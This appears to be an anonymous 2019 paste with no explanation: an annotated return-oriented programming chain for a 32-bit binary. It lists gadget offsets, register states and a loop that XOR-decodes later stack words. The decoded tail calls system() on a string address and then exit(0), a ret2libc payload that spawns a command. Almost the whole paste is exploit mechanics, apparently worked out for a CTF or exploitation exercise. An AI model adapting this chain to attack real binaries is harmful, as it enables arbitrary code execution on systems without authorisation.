Untitled

a guest Jun 20th, 2019 40 Never
0   [ST] *POP EBP*            | EBP=01010101
4   [79] POP ESI              | ESI=FFFFFFF6
12  [7F] POP EBX              | EBX=FFFFFFFF
20  [B7] NOT EBX              | EBX=00000000
24  [A0] NEG ESI              | ESI=0000000A
28  [81] ADD EBX,ESP          | EBX=&BASE[32]
32  [84] ADD EBX,20           | EBX=&BASE[52]
36  [84] ADD EBX,20           | EBX=&BASE[72]
40  [84] ADD EBX,20           | EBX=&BASE[92]
44  [AA] MOV DPTR [EBX-4],ESP | BASE[88] = &BASE[48]
48  [88] MOV EAX, DPTR [EBX]  | EAX = [EBX]
52  [9B] XOR EAX, EBP         | EAX ^= 01010101
56  [A3] MOV DPTR [EBX], EAX  | [EBX] = EAX
60  [7B] ADD EBX,4            | EBX += 4
64  [98] XOR EAX,EAX          | EAX = 0
68  [8D] SUB ESI, 1           | ESI -= 1
72  [A6] RCR EAX, 28          | RCR(EAX, 28)  # eax = esi < 0 ? 16 : 0
76  [C0] NO-OP (ret gadget)   |
80  [AE] ADD ESP,EAX          | ESP += EAX    # if eax == 16 then next esp is 84+16=100
84  [9E] POP ESP              | ESP = BASE[88]


for (i in 92..132 step 4) {
    stack[dword i] ^= 01010101
}

memory after xor:

C0 85 04 08 C0 85 04 08 C0 85 04 08
D0 EC E5 F7
C0 1E E5 F7
38 A0 04 08
00 00 00 00

92  [C0] NO-OP (ret gadget)
96  [C0] NO-OP (ret gadget)
100 [C0] NO-OP (ret gadget)
104 &system
108 &exit
112 system arg: 0804A038
116 exit arg: 0